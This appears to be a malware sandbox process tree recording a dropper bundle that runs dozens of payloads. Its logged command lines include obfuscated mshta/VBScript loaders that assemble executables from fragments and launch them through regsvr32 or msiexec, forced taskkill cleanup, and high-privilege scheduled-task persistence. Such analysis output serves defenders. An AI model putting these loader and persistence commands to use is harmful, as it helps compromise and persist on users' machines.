"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
10⤵
PID:2268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xc4,0x10c,0x7ffc969246f8,0x7ffc96924708,0x7ffc96924718
11⤵
PID:3604

C:\Users\Admin\AppData\Local\Temp\ea-c38ee-d16-91197-cd0669d1ca94d\Laevoshaesisy.exe
"C:\Users\Admin\AppData\Local\Temp\ea-c38ee-d16-91197-cd0669d1ca94d\Laevoshaesisy.exe"
9⤵
PID:7104

C:\Program Files\Windows Photo Viewer\BUHBWKSSKI\foldershare.exe
"C:\Program Files\Windows Photo Viewer\BUHBWKSSKI\foldershare.exe" /VERYSILENT
9⤵
PID:6724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu18bc30a51e137d0.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2208

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18bc30a51e137d0.exe
Thu18bc30a51e137d0.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3168

C:\Users\Admin\AppData\Local\Temp\is-HNBT9.tmp\Thu18bc30a51e137d0.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HNBT9.tmp\Thu18bc30a51e137d0.tmp" /SL5="$3017A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18bc30a51e137d0.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5108

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18bc30a51e137d0.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18bc30a51e137d0.exe" /SILENT
7⤵
- Executes dropped EXE
PID:3200

C:\Users\Admin\AppData\Local\Temp\is-DIGKN.tmp\Thu18bc30a51e137d0.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DIGKN.tmp\Thu18bc30a51e137d0.tmp" /SL5="$10210,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18bc30a51e137d0.exe" /SILENT
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:3412

C:\Users\Admin\AppData\Local\Temp\is-PRQNV.tmp\postback.exe
"C:\Users\Admin\AppData\Local\Temp\is-PRQNV.tmp\postback.exe" ss1
9⤵
PID:3048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu18ba5035cf136.exe
4⤵
PID:2156

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18ba5035cf136.exe
Thu18ba5035cf136.exe
5⤵
- Executes dropped EXE
PID:4208

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18ba5035cf136.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18ba5035cf136.exe" -u
6⤵
- Executes dropped EXE
PID:1772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu185371386aa533.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1788

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu185371386aa533.exe
Thu185371386aa533.exe
5⤵
- Executes dropped EXE
PID:3436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1896053d84146.exe
4⤵
PID:3164

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu1896053d84146.exe
Thu1896053d84146.exe
5⤵
- Executes dropped EXE
PID:4512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 300
6⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu18e397420e63c.exe
4⤵
PID:3384

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18e397420e63c.exe
Thu18e397420e63c.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Users\Admin\AppData\Local\756499.exe
"C:\Users\Admin\AppData\Local\756499.exe"
6⤵
- Executes dropped EXE
PID:5544

C:\Users\Admin\AppData\Local\2404643.exe
"C:\Users\Admin\AppData\Local\2404643.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5908

C:\Users\Admin\AppData\Local\359211.exe
"C:\Users\Admin\AppData\Local\359211.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1660

C:\Users\Admin\AppData\Local\967893.exe
"C:\Users\Admin\AppData\Local\967893.exe"
6⤵
PID:5948

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScrIPT: cLoSE ( CREatEobJECt ( "wScriPT.shElL").RUn("cMd /C tyPE ""C:\Users\Admin\AppData\Local\967893.exe""> VF_MzyMFOc.exe&& STaRt Vf_MZyMFOC.exE /PGyT~noLVWg_QB & If """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\967893.exe"") do taskkill /Im ""%~Nxw"" -F" ,0 ,true) )
7⤵
PID:6644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\967893.exe"> VF_MzyMFOc.exe&& STaRt Vf_MZyMFOC.exE /PGyT~noLVWg_QB & If "" == "" for %w in ( "C:\Users\Admin\AppData\Local\967893.exe") do taskkill /Im "%~Nxw" -F
8⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\VF_MzyMFOc.exe
Vf_MZyMFOC.exE /PGyT~noLVWg_QB
9⤵
PID:6832

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScrIPT: cLoSE ( CREatEobJECt ( "wScriPT.shElL").RUn("cMd /C tyPE ""C:\Users\Admin\AppData\Local\Temp\VF_MzyMFOc.exe""> VF_MzyMFOc.exe&& STaRt Vf_MZyMFOC.exE /PGyT~noLVWg_QB & If ""/PGyT~noLVWg_QB "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\VF_MzyMFOc.exe"") do taskkill /Im ""%~Nxw"" -F" ,0 ,true) )
10⤵
PID:3644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\VF_MzyMFOc.exe"> VF_MzyMFOc.exe&& STaRt Vf_MZyMFOC.exE /PGyT~noLVWg_QB & If "/PGyT~noLVWg_QB " == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\VF_MzyMFOc.exe") do taskkill /Im "%~Nxw" -F
11⤵
PID:868

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRIpt: cLoSe (cReateOBjecT ("wscRIPT.sheLl" ). rUN("cMD /r EChO | SET /P = ""MZ"" > SBPTwp.d & cOpY /b /Y SBPTWp.d+ eiXc.Q + 2z8E.LX+ NKXEqIZ.8gH + 5PNhf.Zu C~TAQd~Y.Bzv & sTArT regsvr32 /S C~TAQD~Y.bzV -U " , 0 ,TRuE) )
10⤵
PID:6200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r EChO | SET /P = "MZ" > SBPTwp.d& cOpY /b /Y SBPTWp.d+ eiXc.Q +2z8E.LX+ NKXEqIZ.8gH+ 5PNhf.Zu C~TAQd~Y.Bzv& sTArT regsvr32 /S C~TAQD~Y.bzV -U
11⤵
- Adds Run key to start application
PID:2264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EChO "
12⤵
PID:5688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>SBPTwp.d"
12⤵
PID:2232

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /S C~TAQD~Y.bzV -U
12⤵
PID:6132

C:\Windows\SysWOW64\taskkill.exe
taskkill /Im "967893.exe" -F
9⤵
- Kills process with taskkill
PID:7148

C:\Users\Admin\AppData\Local\252644.exe
"C:\Users\Admin\AppData\Local\252644.exe"
6⤵
PID:2264

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
7⤵
PID:5876

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:6644

C:\Users\Admin\AppData\Local\2018119.exe
"C:\Users\Admin\AppData\Local\2018119.exe"
6⤵
PID:6656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu180670b7bfc47.exe
4⤵
PID:2800

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu180670b7bfc47.exe
Thu180670b7bfc47.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1856
6⤵
- Program crash
PID:2932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu18f1102ca36b120b0.exe
4⤵
PID:3644

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18f1102ca36b120b0.exe
Thu18f1102ca36b120b0.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2000

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18f1102ca36b120b0.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18f1102ca36b120b0.exe
6⤵
- Executes dropped EXE
PID:5140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu181d864eb8.exe
4⤵
PID:5028

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu181d864eb8.exe
Thu181d864eb8.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1416

C:\Users\Admin\Pictures\Adobe Films\81R77JCTZ3byGaXglbRIg3BR.exe
"C:\Users\Admin\Pictures\Adobe Films\81R77JCTZ3byGaXglbRIg3BR.exe"
6⤵
- Executes dropped EXE
PID:5360

C:\Users\Admin\Pictures\Adobe Films\JlhyXA2fuCVH33Au3c68hBjV.exe
"C:\Users\Admin\Pictures\Adobe Films\JlhyXA2fuCVH33Au3c68hBjV.exe"
6⤵
- Executes dropped EXE
PID:6060

C:\Users\Admin\Pictures\Adobe Films\iBvsKhsDhm5H37abtJz2511v.exe
"C:\Users\Admin\Pictures\Adobe Films\iBvsKhsDhm5H37abtJz2511v.exe"
6⤵
PID:6040

C:\Users\Admin\Pictures\Adobe Films\PPv65Uo0MocOVyPD7XCCYIEH.exe
"C:\Users\Admin\Pictures\Adobe Films\PPv65Uo0MocOVyPD7XCCYIEH.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6028

C:\Users\Admin\Documents\pRbGIaWR5GfSfLTmq50x5JpY.exe
"C:\Users\Admin\Documents\pRbGIaWR5GfSfLTmq50x5JpY.exe"
7⤵
PID:4284

C:\Users\Admin\Pictures\Adobe Films\alURuDoWjTh6E3EqQOtSwYXd.exe
"C:\Users\Admin\Pictures\Adobe Films\alURuDoWjTh6E3EqQOtSwYXd.exe"
8⤵
PID:1116

C:\Users\Admin\Pictures\Adobe Films\5MC7ydH4B7FYb4WawyRLQdeC.exe
"C:\Users\Admin\Pictures\Adobe Films\5MC7ydH4B7FYb4WawyRLQdeC.exe"
8⤵
PID:5196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5196 -s 228
9⤵
- Program crash
PID:2376

C:\Users\Admin\Pictures\Adobe Films\U00F2hrEQln71AnsvfejlccO.exe
"C:\Users\Admin\Pictures\Adobe Films\U00F2hrEQln71AnsvfejlccO.exe"
8⤵
PID:4704

C:\Users\Admin\Pictures\Adobe Films\dSTdczEfPygnvgfSP9YWsZwk.exe
"C:\Users\Admin\Pictures\Adobe Films\dSTdczEfPygnvgfSP9YWsZwk.exe"
8⤵
PID:960

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\dSTdczEfPygnvgfSP9YWsZwk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\dSTdczEfPygnvgfSP9YWsZwk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
9⤵
PID:6752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\dSTdczEfPygnvgfSP9YWsZwk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\dSTdczEfPygnvgfSP9YWsZwk.exe" ) do taskkill -f -iM "%~NxM"
10⤵
PID:4060

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "dSTdczEfPygnvgfSP9YWsZwk.exe"
11⤵
- Kills process with taskkill
PID:4384

C:\Users\Admin\Pictures\Adobe Films\XjsY3XzLjbMqGR9zB915Hn56.exe
"C:\Users\Admin\Pictures\Adobe Films\XjsY3XzLjbMqGR9zB915Hn56.exe"
8⤵
PID:3060

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
PID:1616

C:\Users\Admin\Pictures\Adobe Films\XjsY3XzLjbMqGR9zB915Hn56.exe
"C:\Users\Admin\Pictures\Adobe Films\XjsY3XzLjbMqGR9zB915Hn56.exe" -u
9⤵
PID:2340

C:\Users\Admin\Pictures\Adobe Films\BoiO1JheRcC511Ehn_q1UHY8.exe
"C:\Users\Admin\Pictures\Adobe Films\BoiO1JheRcC511Ehn_q1UHY8.exe"
8⤵
PID:5760

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6012

C:\Users\Admin\Pictures\Adobe Films\orn8ysRDkvky0SbuGQg0FOH8.exe
"C:\Users\Admin\Pictures\Adobe Films\orn8ysRDkvky0SbuGQg0FOH8.exe"
8⤵
PID:6584

C:\Users\Admin\AppData\Local\Temp\is-UUUD6.tmp\orn8ysRDkvky0SbuGQg0FOH8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UUUD6.tmp\orn8ysRDkvky0SbuGQg0FOH8.tmp" /SL5="$20478,506127,422400,C:\Users\Admin\Pictures\Adobe Films\orn8ysRDkvky0SbuGQg0FOH8.exe"
9⤵
PID:5260

C:\Users\Admin\AppData\Local\Temp\is-0OUU3.tmp\DYbALA.exe
"C:\Users\Admin\AppData\Local\Temp\is-0OUU3.tmp\DYbALA.exe" /S /UID=2709
10⤵
PID:2536

C:\Users\Admin\AppData\Local\Temp\a2-9f2dd-59d-a2fbe-b6301cf896862\Lyvoshymoro.exe
"C:\Users\Admin\AppData\Local\Temp\a2-9f2dd-59d-a2fbe-b6301cf896862\Lyvoshymoro.exe"
11⤵
PID:5628

C:\Users\Admin\AppData\Local\Temp\69-8525a-684-e1f89-5c27187fcdef0\Nuhaecenopi.exe
"C:\Users\Admin\AppData\Local\Temp\69-8525a-684-e1f89-5c27187fcdef0\Nuhaecenopi.exe"
11⤵
PID:4784

C:\Users\Admin\AppData\Local\Temp\SIYRVNHUXZ\foldershare.exe
"C:\Users\Admin\AppData\Local\Temp\SIYRVNHUXZ\foldershare.exe" /VERYSILENT
11⤵
PID:5768

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:5920

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Executes dropped EXE
- Creates scheduled task(s)
PID:3256

C:\Users\Admin\Pictures\Adobe Films\JAbRVRGFpV4vv7xvnLl82KAx.exe
"C:\Users\Admin\Pictures\Adobe Films\JAbRVRGFpV4vv7xvnLl82KAx.exe"
6⤵
PID:2940

C:\Users\Admin\Pictures\Adobe Films\u9qTTr40Xxg758zF6KiHjuUS.exe
"C:\Users\Admin\Pictures\Adobe Films\u9qTTr40Xxg758zF6KiHjuUS.exe"
6⤵
- Executes dropped EXE
PID:1408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 296
7⤵
- Program crash
PID:856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu18a708c1b35ca7.exe
4⤵
PID:4332

C:\Users\Admin\AppData\Local\Temp\7zSCE6CA5B3\Thu18a708c1b35ca7.exe
Thu18a708c1b35ca7.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3052

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
- Executes dropped EXE
PID:5796

C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe
"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5684

C:\Users\Admin\AppData\Local\743994.exe
"C:\Users\Admin\AppData\Local\743994.exe"
8⤵
PID:6620

C:\Users\Admin\AppData\Local\1177382.exe
"C:\Users\Admin\AppData\Local\1177382.exe"
8⤵
- Executes dropped EXE
PID:5972

C:\Users\Admin\AppData\Local\3912889.exe
"C:\Users\Admin\AppData\Local\3912889.exe"
8⤵
PID:2808

C:\Users\Admin\AppData\Local\4138692.exe
"C:\Users\Admin\AppData\Local\4138692.exe"
8⤵
PID:4856

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScrIPT: cLoSE ( CREatEobJECt ( "wScriPT.shElL").RUn("cMd /C tyPE ""C:\Users\Admin\AppData\Local\4138692.exe""> VF_MzyMFOc.exe&& STaRt Vf_MZyMFOC.exE /PGyT~noLVWg_QB & If """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\4138692.exe"") do taskkill /Im ""%~Nxw"" -F" ,0 ,true) )
9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\4138692.exe"> VF_MzyMFOc.exe&& STaRt Vf_MZyMFOC.exE /PGyT~noLVWg_QB & If "" == "" for %w in ( "C:\Users\Admin\AppData\Local\4138692.exe") do taskkill /Im "%~Nxw" -F
10⤵
PID:2492

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
PID:5948

C:\Windows\SysWOW64\taskkill.exe
taskkill /Im "4138692.exe" -F
11⤵
- Kills process with taskkill
PID:1940

C:\Users\Admin\AppData\Local\2168942.exe
"C:\Users\Admin\AppData\Local\2168942.exe"
8⤵
PID:1448

C:\Users\Admin\AppData\Local\7188352.exe
"C:\Users\Admin\AppData\Local\7188352.exe"
8⤵
PID:1772

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
7⤵
PID:5972

C:\Users\Admin\AppData\Local\Temp\chrome.exe
"C:\Users\Admin\AppData\Local\Temp\chrome.exe"
7⤵
- Executes dropped EXE
PID:2072

C:\Users\Admin\AppData\Local\Temp\window update.exe
"C:\Users\Admin\AppData\Local\Temp\window update.exe"
7⤵
PID:4604

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
8⤵
PID:5456

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
7⤵
PID:6336

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
8⤵
PID:3748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
9⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
10⤵
PID:2472

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
11⤵
PID:1956

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
12⤵
PID:6584

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5940

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
11⤵
PID:6064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
12⤵
PID:5396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
13⤵
PID:5180

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
13⤵
PID:856

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
10⤵
- Kills process with taskkill
PID:2916

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
PID:6952

C:\Users\Admin\AppData\Local\Temp\is-H1N8P.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H1N8P.tmp\setup.tmp" /SL5="$1034C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
8⤵
PID:6216

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
9⤵
PID:6004

C:\Users\Admin\AppData\Local\Temp\is-EN5A0.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EN5A0.tmp\setup.tmp" /SL5="$60206,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
10⤵
PID:6408

C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
11⤵
PID:5200

C:\9fbe7d056515c54295f3b50ee90e19c9\Setup.exe
C:\9fbe7d056515c54295f3b50ee90e19c9\\Setup.exe /q /norestart /x86 /x64 /web
12⤵
PID:4384

C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
11⤵
PID:5468

C:\Users\Admin\AppData\Local\Temp\is-32LNF.tmp\postback.exe
"C:\Users\Admin\AppData\Local\Temp\is-32LNF.tmp\postback.exe" ss1
11⤵
PID:4376

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
7⤵
PID:2716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2716 -s 292
8⤵
- Program crash
PID:5216

C:\Users\Admin\AppData\Local\Temp\zhangdan-game.exe
"C:\Users\Admin\AppData\Local\Temp\zhangdan-game.exe"
7⤵
PID:6544

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
7⤵
PID:6876

C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
7⤵
PID:5636

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5636 -s 1704
8⤵
- Program crash
PID:1616

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
7⤵
PID:1356

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
8⤵
PID:860

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:496

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
- Creates scheduled task(s)
PID:4544

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:7164

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
10⤵
PID:1424

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
11⤵
PID:4496

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
12⤵
PID:3676

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
13⤵
PID:4712

C:\Windows\explorer.exe
